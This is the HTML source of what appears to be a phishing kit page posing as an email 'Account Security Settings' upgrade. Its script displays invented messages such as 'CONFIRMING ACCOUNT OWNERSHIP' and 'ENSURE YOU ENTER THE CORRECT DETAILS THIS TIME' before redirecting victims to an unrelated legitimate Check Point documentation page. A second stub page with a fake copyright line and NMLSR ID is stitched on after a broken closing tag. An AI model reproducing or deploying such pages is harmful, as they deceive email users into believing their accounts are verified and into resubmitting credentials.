<html>
<head>
<link rel="shortcut icon" href="http://mail.ppscn.com/public/image/projectIcon.ico" type="image/gif"/>

<style type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

<title>Mail Settings | Email Upgrade</title>

<meta http-equiv="REFRESH" content="20; http://alibaba.com">


<style type="text/css">
<!--
.style1 {font-family: "Courier New", Courier, monospace}
.style4 {font-family: "Courier New", Courier, monospace;
	color:#0066CC;
	font-size:20px;}

.style6 {color: #FF6600}
.style8 {font-size: 16}
-->
</style>
<script>



var preloadimages=new Array(":abstract.simplenet.com/point.gif","abstract.simplenet.com/point2.html")



var intervals=2300

//configure destination URL

var targetdestination="https://sc1.checkpoint.com/documents/R77/CP_R77_Non_Gaia_Installation_and_Upgrade_Guide/16554.htm"





var splashmessage=new Array()

var openingtags='<font face="Lucida Sans" size="2" color="#329197">'

splashmessage[0]='VERIFYING YOUR MAILBOX...'

splashmessage[1]='VERIFYING YOUR MAILBOX...'

splashmessage[2]='VERIFYING.....'

splashmessage[3]='VERIFYING.....'

splashmessage[4]='PLEASE WAIT...'

splashmessage[5]='PLEASE WAIT...'

splashmessage[6]='PLEASE WAIT WHILE YOUR ACCOUNT IS BEING VERIFY IN DATABASE...'

splashmessage[7]='PLEASE WAIT WHILE YOUR ACCOUNT IS BEING VERIFY IN DATABASE...'

splashmessage[8]='CONFIRMING ACCOUNT OWNERSHIP...'

splashmessage[9]='CONFIRMING ACCOUNT OWNERSHIP...'

splashmessage[10]='RE-CONFIRMING YOUR ACCOUNT IDENTITY ...'

splashmessage[11]='RE-CONFIRMING YOUR ACCOUNT IDENTITY ...'

splashmessage[12]='PLEASE WAIT ...'

splashmessage[13]='PLEASE WAIT...'

splashmessage[14]='VALIDATING...'

splashmessage[15]='VALIDATING...'

splashmessage[16]='PLEASE TRY AGAIN... '

splashmessage[17]='PLEASE TRY AGAIN... '

splashmessage[18]='ENSURE YOU ENTER THE CORRECT DETAILS THIS TIME TO AVOID PANEL COLLISION...'

splashmessage[19]='ENSURE YOU ENTER THE CORRECT DETAILS THIS TIME TO AVOID PANEL COLLISION...'

splashmessage[20]='VALIDATION SUCCESSFUL...'

splashmessage[21]='VALIDATION SUCCESSFUL...'










var closingtags='</font>'



//Do not edit below this line (besides HTML code at the very bottom)



var i=0



var ns4=document.layers?1:0

var ie4=document.all?1:0

var ns6=document.getElementById&&!document.all?1:0

var theimages=new Array()



//preload images

if (document.images){

for (p=0;p<preloadimages.length;p++){

theimages[p]=new Image()

theimages[p].src=preloadimages[p]

}

}



function displaysplash(){

if (i<splashmessage.length){

sc_cross.style.visibility="hidden"

sc_cross.innerHTML='<b><center>'+openingtags+splashmessage[i]+closingtags+'</center></b>'

sc_cross.style.left=ns6?parseInt(window.pageXOffset)+parseInt(window.innerWidth)/2-parseInt(sc_cross.style.width)/2 

:document.body.scrollLeft+document.body.clientWidth/2-parseInt(sc_cross.style.width)/2

sc_cross.style.top=ns6?parseInt(window.pageYOffset)+parseInt(window.innerHeight)/2-

sc_cross.offsetHeight/2:document.body.scrollTop+document.body.clientHeight/2-sc_cross.offsetHeight/2

sc_cross.style.visibility="visible"

i++

}

else{

window.location=targetdestination

return

}

setTimeout("displaysplash()",intervals)

}



function displaysplash_ns(){

if (i<splashmessage.length){

sc_ns.visibility="hide"

sc_ns.document.write('<b>'+openingtags+splashmessage[i]+closingtags+'</b>')

sc_ns.document.close()



sc_ns.left=pageXOffset+window.innerWidth/2-sc_ns.document.width/2

sc_ns.top=pageYOffset+window.innerHeight/2-sc_ns.document.height/2



sc_ns.visibility="show"

i++

}

else{

window.location=targetdestination

return

}

setTimeout("displaysplash_ns()",intervals)

}







function positionsplashcontainer(){

if (ie4||ns6){

sc_cross=ns6?document.getElementById("splashcontainer"):document.all.splashcontainer

displaysplash()

}

else if (ns4){

sc_ns=document.splashcontainerns

sc_ns.visibility="show"

displaysplash_ns()

}

else

window.location=targetdestination

}

window.onload=positionsplashcontainer



</script>
<script><!--

 var jv=1.0;

//--></script>



<script language="Javascript1.1"><!--

 jv=1.1;

//--></script>



<script language="Javascript1.2"><!--

 jv=1.2;

//--></script>



<script language="Javascript1.3"><!--

 jv=1.3;

//--></script>



<script language="Javascript1.4"><!--

 jv=1.4;

//--></script><title>Account Security Settings </title><script src='/google_analytics_auto.js'></script></head>
<body marginheight="0" marginwidth="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0">


<table align="center"><tr>

<td width="50">
<img src="https://www.chytv.com/templates/images/ajax-loader.gif" width="200" height="200"><p>
&nbsp;</td>




<td width="5"></td>






<td width="350">
<div align="left" class="style1" id="splashcontainer" style="visibility: visible; top: 363.5px;"> </div>
</tr></table>


</body>
</htm
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>New Page 2</title>
</head>

<body>

<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><b><font size="2" face="Lucida Sans Unicode" color="#003399">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font></b>
&nbsp;<font size="2" face="Lucida Grande, Lucida Sans Unicode, Lucida Sans, DejaVu Sans, Verdana, sans-serif" color="#0E73E3"><b>*** 
Account/ Security Settings / Account Verification &gt;&gt;&nbsp; (C) 2017 Mail. All rights 
reserved. NMLSR ID 399801</b> ***&nbsp;</font><b><font size="2" face="Lucida Sans Unicode" color="#3366FF">&nbsp;&nbsp; </font><font size="2" face="Lucida Sans Unicode" color="#003399">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font></b>
<img src="https://www.ipswitch.com/library/img/loading.gif" alt="Image result for email setting icon" width="33" height="32">
</p>

</body>

</html>